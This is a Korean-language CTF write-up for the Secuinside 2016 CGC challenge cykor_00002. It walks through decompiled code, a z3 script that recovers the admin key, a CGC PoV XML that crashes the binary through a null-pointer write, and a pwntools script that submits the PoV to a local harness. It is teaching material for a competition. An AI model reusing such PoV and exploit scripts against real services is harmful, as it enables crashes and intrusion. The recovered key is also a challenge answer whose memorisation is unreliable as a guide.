https://github.com/ctfs/write-ups-2016/tree/master/secuinside-ctf-quals-2016/cgc/cykor_00002-150
write up : https://ctf.rip/secuinside2016-cykor00002/
vagrant@crs:~$ ./cykor_00002 ---------------------------------------- - Simple Echo System - ---------------------------------------- What is your name? name: ADMIN + Gimme a key : aaaaaaaaaaaaaaa Get out of here :( |
우선 실행해 보고, 실행된 내용의 문자열을 기반으로 IDA 분석을 진행하도록 합시다.
/*
 * main_sub_8048F50 - decompiler (IDA) output for the challenge's main routine,
 * reformatted; identifiers are as IDA/the author named them.
 *
 * Stack layout from the IDA offsets: v1 at ebp-0x448, v2 at ebp-0x408 (so the
 * name buffer v1 has 0x40 bytes before v2 begins), v3 = v2 + 1, and v4 at
 * ebp-8, so the echo buffer v2 spans 0x400 bytes.  The `char` types on v1/v2
 * are decompiler artifacts; both are used as buffers.
 *
 * Points worth noting for anyone analysing the binary (inferred from the
 * calls below and the transcripts on this page, not verified here):
 *  - sub_8048E10(&v1, "ADMIN", 5u) compares 5 bytes and, like memcmp/strncmp,
 *    is non-zero on mismatch: the transcript shows "ADMIN" taking the else
 *    branch.  Only the first five bytes of the name are involved.
 *  - the key is read into the global buffer at 0x805F454 with a limit of 27,
 *    while compare_key_sub_8048150() checks 25 bytes (0x805F454..0x805F46C);
 *    what the two extra bytes would overwrite is not visible here.
 *  - after a valid key, an echo line starting with "CK" executes
 *    MEMORY[0] = 10, a store to address 0 - the segfault in the transcript.
 */
int main_sub_8048F50()
{
  char v1; // [esp+70h] [ebp-448h]@1   -- name buffer (size read by sub_8048E90 not visible here)
  char v2; // [esp+B0h] [ebp-408h]@3   -- echo buffer, 0x400 bytes up to v4
  char v3; // [esp+B1h] [ebp-407h]@4   -- second byte of the echo buffer
  int v4; // [esp+4B0h] [ebp-8h]@1

  v4 = 0;
  sub_8049FC0("----------------------------------------\n");   // presumably a printf-like routine
  sub_8049FC0("- Simple Echo System -\n");
  sub_8049FC0("----------------------------------------\n");
  sub_8049FC0("What is your name?\n");
  sub_8048E90(&v1);                                 // reads the name into v1
  if ( sub_8048E10((int)&v1, (int)"ADMIN", 5u) )    // non-zero == name is NOT "ADMIN" (5-byte compare)
  {
    // Plain echo path for non-admin names.
    sub_8049FC0("Hi %s\n");   // vararg dropped by the decompiler; the transcript shows the name is printed
    sub_8049FC0(": ");
    // Read up to 1000 bytes, delimiter 10 ('\n'), and terminate at the returned
    // length; assuming the return is the byte count (<= 1000) that stays inside
    // the 0x400-byte buffer.
    *(&v2 + sub_80480A0(&v2, 1000, 10)) = 0;
    sub_8049FC0("%s\n");
  }
  else
  {
    // Admin path: the key goes into the global byte array checked by
    // compare_key_sub_8048150(); limit 27 is two bytes more than it checks.
    sub_8049FC0("+ Gimme a key : ");
    sub_80480A0(&01_byte_805F454, 27, 10);
    if ( compare_key_sub_8048150() )
    {
      sub_8049FC0("Welcome Admin :)\n");
      sub_8049FC0(": ");
      sub_80480A0(&v2, 1000, 10);   // unlike the branch above, no terminator is written here
      if ( v2 == 'C' && v3 == 'K' )
        MEMORY[0] = 10;   // write to address 0: the crash the PoV below triggers
      sub_8049FC0("%s\n");
    }
    else
    {
      sub_8049FC0("Get out of here :(\n");
    }
  }
  return 0;
}
compare_key_sub_8048150()를 확인하면 특정 값을 맞춰야만 통과할 수 있게 되어 있습니다.
/*
 * compare_key_sub_8048150 - decompiler (IDA) output, reformatted one check
 * per line; identifiers are as IDA/the author named them.
 *
 * The globals NN_byte_805F4xx are the bytes of the key buffer that main fills
 * with sub_80480A0(&01_byte_805F454, 27, 10): NN is the 1-based byte index
 * and the address is 0x805F453 + NN (01 -> 0x805F454 ... 25 -> 0x805F46C).
 * Their declared type is not visible here; assumed to be single bytes.
 *
 * Each `if` tests one linear sum of key bytes against a constant and counts
 * a hit in v1; the function returns true only when all 25 checks passed.
 * Because the whole check is a system of 25 linear equations in the 25 key
 * bytes, the key is recoverable offline from the binary alone (the z3 script
 * further down does exactly that) - a check of this shape hides nothing from
 * anyone holding the binary.
 *
 * Returns: nonzero if every one of the 25 sums matched, else 0.
 */
_BOOL4 compare_key_sub_8048150()
{
  signed int v1; // [esp+0h] [ebp-4h]@1   -- number of checks that passed

  v1 = 0;
  /* 1 */  if ( 21_byte_805F468 + 04_byte_805F457 + 13_byte_805F460 + 22_byte_805F469 + 24_byte_805F46B + 08_byte_805F45B + 02_byte_805F455 + 07_byte_805F45A + 10_byte_805F45D + 18_byte_805F465 + 12_byte_805F45F + 19_byte_805F466 + 06_byte_805F459 == 1068 ) v1 = 1;
  /* 2 */  if ( 11_byte_805F45E + 08_byte_805F45B + 10_byte_805F45D + 18_byte_805F465 + 19_byte_805F466 + 23_byte_805F46A + 03_byte_805F456 + 02_byte_805F455 + 14_byte_805F461 + 16_byte_805F463 == 760 ) ++v1;
  /* 3 */  if ( 15_byte_805F462 + 02_byte_805F455 + 10_byte_805F45D + 17_byte_805F464 + 01_byte_805F454 + 14_byte_805F461 + 16_byte_805F463 + 12_byte_805F45F + 13_byte_805F460 + 21_byte_805F468 + 06_byte_805F459 + 23_byte_805F46A + 22_byte_805F469 == 997 ) ++v1;
  /* 4 */  if ( 05_byte_805F458 + 09_byte_805F45C + 20_byte_805F467 + 22_byte_805F469 + 02_byte_805F455 + 07_byte_805F45A + 24_byte_805F46B + 14_byte_805F461 + 17_byte_805F464 + 13_byte_805F460 == 782 ) ++v1;
  /* 5 */  if ( 20_byte_805F467 + 11_byte_805F45E + 19_byte_805F466 + 17_byte_805F464 + 14_byte_805F461 + 03_byte_805F456 + 08_byte_805F45B + 07_byte_805F45A + 21_byte_805F468 + 15_byte_805F462 == 778 ) ++v1;
  /* 6 */  if ( 21_byte_805F468 + 20_byte_805F467 + 06_byte_805F459 + 10_byte_805F45D + 05_byte_805F458 + 15_byte_805F462 + 23_byte_805F46A + 22_byte_805F469 + 04_byte_805F457 + 25_byte_805F46C + 13_byte_805F460 + 24_byte_805F46B + 19_byte_805F466 + 14_byte_805F461 == 1123 ) ++v1;
  /* 7 */  if ( 23_byte_805F46A + 09_byte_805F45C + 06_byte_805F459 + 14_byte_805F461 + 16_byte_805F463 + 12_byte_805F45F + 08_byte_805F45B + 11_byte_805F45E + 02_byte_805F455 + 19_byte_805F466 + 01_byte_805F454 + 15_byte_805F462 + 20_byte_805F467 + 03_byte_805F456 + 24_byte_805F46B == 1180 ) ++v1;
  /* 8 */  if ( 06_byte_805F459 + 25_byte_805F46C + 12_byte_805F45F + 24_byte_805F46B + 20_byte_805F467 + 23_byte_805F46A + 01_byte_805F454 + 05_byte_805F458 + 04_byte_805F457 + 09_byte_805F45C + 14_byte_805F461 + 21_byte_805F468 + 19_byte_805F466 + 03_byte_805F456 + 10_byte_805F45D + 18_byte_805F465 + 08_byte_805F45B + 13_byte_805F460 == 1498 ) ++v1;
  /* 9 */  if ( 19_byte_805F466 + 24_byte_805F46B + 15_byte_805F462 + 05_byte_805F458 + 25_byte_805F46C + 02_byte_805F455 + 01_byte_805F454 + 22_byte_805F469 + 06_byte_805F459 + 17_byte_805F464 + 08_byte_805F45B + 13_byte_805F460 + 16_byte_805F463 + 21_byte_805F468 + 04_byte_805F457 == 1213 ) ++v1;
  /* 10 */ if ( 18_byte_805F465 + 22_byte_805F469 + 10_byte_805F45D + 11_byte_805F45E + 07_byte_805F45A + 15_byte_805F462 + 21_byte_805F468 + 02_byte_805F455 + 09_byte_805F45C + 25_byte_805F46C == 779 ) ++v1;
  /* 11 */ if ( 01_byte_805F454 + 04_byte_805F457 + 20_byte_805F467 + 03_byte_805F456 + 24_byte_805F46B + 23_byte_805F46A + 16_byte_805F463 + 21_byte_805F468 + 05_byte_805F458 == 742 ) ++v1;
  /* 12 */ if ( 16_byte_805F463 + 24_byte_805F46B + 20_byte_805F467 + 07_byte_805F45A + 18_byte_805F465 + 11_byte_805F45E + 09_byte_805F45C + 05_byte_805F458 + 06_byte_805F459 + 12_byte_805F45F + 02_byte_805F455 + 10_byte_805F45D + 15_byte_805F462 + 04_byte_805F457 + 21_byte_805F468 == 1196 ) ++v1;
  /* 13 */ if ( 07_byte_805F45A + 02_byte_805F455 + 09_byte_805F45C + 14_byte_805F461 + 12_byte_805F45F + 25_byte_805F46C + 13_byte_805F460 + 22_byte_805F469 + 19_byte_805F466 + 24_byte_805F46B + 15_byte_805F462 + 16_byte_805F463 + 23_byte_805F46A + 18_byte_805F465 == 1091 ) ++v1;
  /* 14 */ if ( 22_byte_805F469 + 18_byte_805F465 + 23_byte_805F46A + 01_byte_805F454 + 05_byte_805F458 + 02_byte_805F455 + 19_byte_805F466 + 20_byte_805F467 + 13_byte_805F460 == 764 ) ++v1;
  /* 15 */ if ( 14_byte_805F461 + 17_byte_805F464 + 23_byte_805F46A + 02_byte_805F455 + 12_byte_805F45F + 25_byte_805F46C + 18_byte_805F465 + 15_byte_805F462 + 11_byte_805F45E + 05_byte_805F458 + 09_byte_805F45C + 08_byte_805F45B + 01_byte_805F454 + 19_byte_805F466 + 07_byte_805F45A + 22_byte_805F469 + 21_byte_805F468 + 10_byte_805F45D == 1463 ) ++v1;
  /* 16 */ if ( 16_byte_805F463 + 09_byte_805F45C + 02_byte_805F455 + 12_byte_805F45F + 22_byte_805F469 + 20_byte_805F467 == 465 ) ++v1;
  /* 17 */ if ( 17_byte_805F464 + 19_byte_805F466 + 12_byte_805F45F + 25_byte_805F46C + 05_byte_805F458 + 20_byte_805F467 + 13_byte_805F460 + 02_byte_805F455 + 07_byte_805F45A + 14_byte_805F461 + 01_byte_805F454 + 22_byte_805F469 == 955 ) ++v1;
  /* 18 */ if ( 07_byte_805F45A + 08_byte_805F45B + 22_byte_805F469 + 19_byte_805F466 + 01_byte_805F454 + 10_byte_805F45D + 15_byte_805F462 + 18_byte_805F465 == 654 ) ++v1;
  /* 19 */ if ( 02_byte_805F455 + 03_byte_805F456 + 17_byte_805F464 + 13_byte_805F460 + 24_byte_805F46B + 01_byte_805F454 + 11_byte_805F45E + 07_byte_805F45A + 21_byte_805F468 + 19_byte_805F466 + 23_byte_805F46A + 08_byte_805F45B + 16_byte_805F463 == 1030 ) ++v1;
  /* 20 */ if ( 23_byte_805F46A + 24_byte_805F46B + 12_byte_805F45F == 275 ) ++v1;
  /* 21 */ if ( 22_byte_805F469 + 04_byte_805F457 + 02_byte_805F455 + 21_byte_805F468 + 01_byte_805F454 + 09_byte_805F45C + 13_byte_805F460 == 563 ) ++v1;
  /* 22 */ if ( 15_byte_805F462 + 06_byte_805F459 + 12_byte_805F45F + 19_byte_805F466 + 18_byte_805F465 + 25_byte_805F46C == 509 ) ++v1;
  /* 23 */ if ( 20_byte_805F467 + 11_byte_805F45E + 13_byte_805F460 + 22_byte_805F469 + 17_byte_805F464 + 25_byte_805F46C + 15_byte_805F462 == 556 ) ++v1;
  /* 24 */ if ( 02_byte_805F455 + 13_byte_805F460 + 22_byte_805F469 + 20_byte_805F467 + 19_byte_805F466 + 03_byte_805F456 + 04_byte_805F457 + 12_byte_805F45F + 16_byte_805F463 + 24_byte_805F46B + 23_byte_805F46A + 18_byte_805F465 + 25_byte_805F46C + 09_byte_805F45C + 06_byte_805F459 + 11_byte_805F45E + 21_byte_805F468 + 17_byte_805F464 == 1464 ) ++v1;
  /* 25 */ if ( 15_byte_805F462 + 22_byte_805F469 + 08_byte_805F45B + 23_byte_805F46A + 21_byte_805F468 + 06_byte_805F459 + 17_byte_805F464 + 11_byte_805F45E + 12_byte_805F45F == 758 ) ++v1;
  // Every check runs regardless of earlier results; only the final count matters.
  return v1 == 25;
}
여기에 있는 변수를 다음과 같이 치환하여, python에서 사용할 수 있는 SMT 솔버인 z3 라이브러리를 활용하여 맞는 값을 찾습니다.
(※ z3 : https://github.com/Z3Prover/z3)
babyhack@ubuntu:~$ python scripts/mk_make.py --python --pypkgdir=/usr/lib/python2.7/dist-packages
babyhack@ubuntu:~$ cd ./build/make; sudo make install
z3가 준비되었다면, 다음의 코드를 사용하면 됩니다.
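from z3 import *

# Unknown key bytes: var_k is the (k+1)-th byte of the global key buffer at
# 0x805F454 that compare_key_sub_8048150() sums over (25 bytes are checked).
KEY_LEN = 25

# One entry per `if` in compare_key_sub_8048150(), in the same order:
# (indices of the key bytes summed, the constant the sum must equal).
# Keeping the equations as data makes each one easy to cross-check against
# the decompiled condition it came from.
EQUATIONS = [
    ([20, 3, 12, 21, 23, 7, 1, 6, 9, 17, 11, 18, 5], 1068),
    ([10, 7, 9, 17, 18, 22, 2, 1, 13, 15], 760),
    ([14, 1, 9, 16, 0, 13, 15, 11, 12, 20, 5, 22, 21], 997),
    ([4, 8, 19, 21, 1, 6, 23, 13, 16, 12], 782),
    ([19, 10, 18, 16, 13, 2, 7, 6, 20, 14], 778),
    ([20, 19, 5, 9, 4, 14, 22, 21, 3, 24, 12, 23, 18, 13], 1123),
    ([22, 8, 5, 13, 15, 11, 7, 10, 1, 18, 0, 14, 19, 2, 23], 1180),
    ([5, 24, 11, 23, 19, 22, 0, 4, 3, 8, 13, 20, 18, 2, 9, 17, 7, 12], 1498),
    ([18, 23, 14, 4, 24, 1, 0, 21, 5, 16, 7, 12, 15, 20, 3], 1213),
    ([17, 21, 9, 10, 6, 14, 20, 1, 8, 24], 779),
    ([0, 3, 19, 2, 23, 22, 15, 20, 4], 742),
    ([15, 23, 19, 6, 17, 10, 8, 4, 5, 11, 1, 9, 14, 3, 20], 1196),
    ([6, 1, 8, 13, 11, 24, 12, 21, 18, 23, 14, 15, 22, 17], 1091),
    ([21, 17, 22, 0, 4, 1, 18, 19, 12], 764),
    ([13, 16, 22, 1, 11, 24, 17, 14, 10, 4, 8, 7, 0, 18, 6, 21, 20, 9], 1463),
    ([15, 8, 1, 11, 21, 19], 465),
    ([16, 18, 11, 24, 4, 19, 12, 1, 6, 13, 0, 21], 955),
    ([6, 7, 21, 18, 0, 9, 14, 17], 654),
    ([1, 2, 16, 12, 23, 0, 10, 6, 20, 18, 22, 7, 15], 1030),
    ([22, 23, 11], 275),
    ([21, 3, 1, 20, 0, 8, 12], 563),
    ([14, 5, 11, 18, 17, 24], 509),
    ([19, 10, 12, 21, 16, 24, 14], 556),
    ([1, 12, 21, 19, 18, 2, 3, 11, 15, 23, 22, 17, 24, 8, 5, 10, 20, 16], 1464),
    ([14, 21, 7, 22, 20, 5, 16, 10, 11], 758),
]


def main():
    """Solve the key-check equations and print the model (or 'no solution')."""
    key = [Int('var_%d' % i) for i in range(KEY_LEN)]
    s = Solver()
    # Each unknown is one byte read from stdin, so keep the solver inside
    # 0..255; with bare Int() unknowns a model could contain values that no
    # input can produce.
    for v in key:
        s.add(v >= 0, v <= 255)
    for idxs, total in EQUATIONS:
        s.add(Sum([key[i] for i in idxs]) == total)
    if s.check() != sat:
        print('no solution')
        return
    print(s.model())


if __name__ == '__main__':
    main()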
[ result ]
babyhack@ubuntu:~/tmp/Secuinside/2016$ python exp.py [var_16 = 89, var_23 = 85, var_20 = 82, var_1 = 72, var_6 = 69, var_12 = 77, var_15 = 51, var_19 = 85, var_22 = 95, var_21 = 78, var_5 = 77, var_14 = 78, var_11 = 95, var_9 = 72, var_3 = 87, var_10 = 69, var_17 = 95, var_4 = 95, var_7 = 95, var_8 = 84, var_2 = 79, var_13 = 48, var_18 = 84, var_24 = 80, var_0 = 83] babyhack@ubuntu:~/tmp/Secuinside/2016$ |
10진수로 표시되기 때문에 문자로 변환하는 코드를 작성해야 한다.
[ convert ]
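# sort.py - turn the z3 model (decimal byte values) into the key string.
# The numbers are the model printed by exp.py above; var_k is the (k+1)-th
# byte of the 25-byte key checked by compare_key_sub_8048150().
KEY_LEN = 25

MODEL = {
    16: 89, 23: 85, 20: 82, 1: 72, 6: 69, 12: 77, 15: 51, 19: 85, 22: 95,
    21: 78, 5: 77, 14: 78, 11: 95, 9: 72, 3: 87, 10: 69, 17: 95, 4: 95,
    7: 95, 8: 84, 2: 79, 13: 48, 18: 84, 24: 80, 0: 83,
}


def key_from_model(values, length=KEY_LEN):
    """Assemble the key from an {index: byte value} mapping, in index order.

    Args:
        values: mapping from var index (0-based) to the byte value z3 found.
        length: number of key bytes expected (25 for this binary).

    Returns:
        The key as a str of `length` characters.

    Raises:
        ValueError: an index in 0..length-1 is missing, or a value is not a
            byte - so a copy-paste slip in the model shows up instead of
            silently producing a wrong key.
    """
    chars = []
    for i in range(length):
        if i not in values:
            raise ValueError('missing value for var_%d' % i)
        b = values[i]
        if not 0 <= b <= 255:
            raise ValueError('var_%d = %r is not a byte' % (i, b))
        chars.append(chr(b))
    return ''.join(chars)


if __name__ == '__main__':
    print(key_from_model(MODEL))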
[ result ]
babyhack@ubuntu:~/tmp/Secuinside/2016$ python sort.py SHOW_ME_THE_M0N3Y_TURN_UP babyhack@ubuntu:~/tmp/Secuinside/2016$
이제 찾은 내용을 테스트해 보도록 합시다.
vagrant@crs:~$ ./cykor_00002 ---------------------------------------- - Simple Echo System - ---------------------------------------- What is your name? name: ADMIN + Gimme a key : HOW_ME_THE_M0N3Y_TURN_UP Get out of here :( vagrant@crs:~$ ./cykor_00002 ---------------------------------------- - Simple Echo System - ---------------------------------------- What is your name? name: SHOW_ME_THE_M0N3Y_TURN_UP Hi SHOW_ME_THE_M0N3Y_TURN_UP :
vagrant@crs:~$ vagrant@crs:~$ ./cykor_00002 ---------------------------------------- - Simple Echo System - ---------------------------------------- What is your name? name: ADMIN + Gimme a key : SHOW_ME_THE_M0N3Y_TURN_UP Welcome Admin :) : CK Segmentation fault (core dumped) vagrant@crs:~$
CGC에 전달하는 코드는 예제 코드를 기반으로 XML로 작성합니다.
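<!DOCTYPE pov SYSTEM "/usr/share/cgc-docs/replay.dtd">
<!--
  CGC replay (PoV) for cykor_00002: follows the ADMIN branch of
  main_sub_8048F50 with the key recovered above, then sends "CK", which
  reaches the MEMORY[0] = 10 store and crashes the challenge binary (the
  segfault shown in the transcript).

  The former "// recv" / "// send" markers are not XML comment syntax - inside
  <replay> they would be parsed as text, not ignored - so they are written as
  real XML comments here.
-->
<pov>
  <cbid>service</cbid>
  <replay>
    <!-- banner and name prompt -->
    <read><delim>\x0a</delim><match><data>----------------------------------------\x0a</data></match></read>
    <read><delim>\x0a</delim><match><data>- Simple Echo System -\x0a</data></match></read>
    <read><delim>\x0a</delim><match><data>----------------------------------------\x0a</data></match></read>
    <read><delim>\x0a</delim><match><data>What is your name?\x0a</data></match></read>
    <read><delim>\x0a</delim><match><data>name: \x0a</data></match></read>
    <!-- sub_8048E10 compares 5 bytes, so this name takes the key branch -->
    <write><data>ADMIN\x0a</data></write>

    <!-- key prompt; the key is the solution of the 25 linear checks -->
    <read><delim>\x0a</delim><match><data>+ Gimme a key : \x0a</data></match></read>
    <write><data>SHOW_ME_THE_M0N3Y_TURN_UP\x0a</data></write>

    <!-- compare_key_sub_8048150 passed; echo prompt follows -->
    <read><delim>\x0a</delim><match><data>Welcome Admin :)\x0a</data></match></read>
    <read><delim>\x0a</delim><match><data>: \x0a</data></match></read>
    <!-- v2 == 'C' and v3 == 'K' -> MEMORY[0] = 10 -->
    <write><data>CK\x0a</data></write>
  </replay>
</pov>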
exploit 코드는 다음과 같습니다.
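#!/usr/bin/python
"""Submit a CGC PoV (pov.xml) to the local PoV harness.

Protocol, exactly as the original script drove it: read one banner line,
send "XML", read a line, send the payload length, read a line, send the
payload, then hand the connection to the user.  File, host and port default
to the values used in this write-up and can be overridden on the command
line: exp.py [pov.xml] [host] [port].
"""
import sys

from pwn import *


def submit_pov(xml_name, host, port):
    """Send the PoV at `xml_name` to host:port and return the open tube.

    The file is read and closed before any network I/O instead of being left
    open for the process lifetime as `open(...).read()` did.
    """
    with open(xml_name, 'rb') as f:
        payload = f.read()
    r = remote(host, port)
    print(r.recvline())
    r.sendline("XML")
    print(r.recvline())
    r.sendline(str(len(payload)))
    print(r.recvline())
    r.sendline(payload)
    return r


if __name__ == '__main__':
    xml_name = sys.argv[1] if len(sys.argv) > 1 else "pov.xml"
    host = sys.argv[2] if len(sys.argv) > 2 else "127.0.0.1"
    port = int(sys.argv[3]) if len(sys.argv) > 3 else 1234
    submit_pov(xml_name, host, port).interactive()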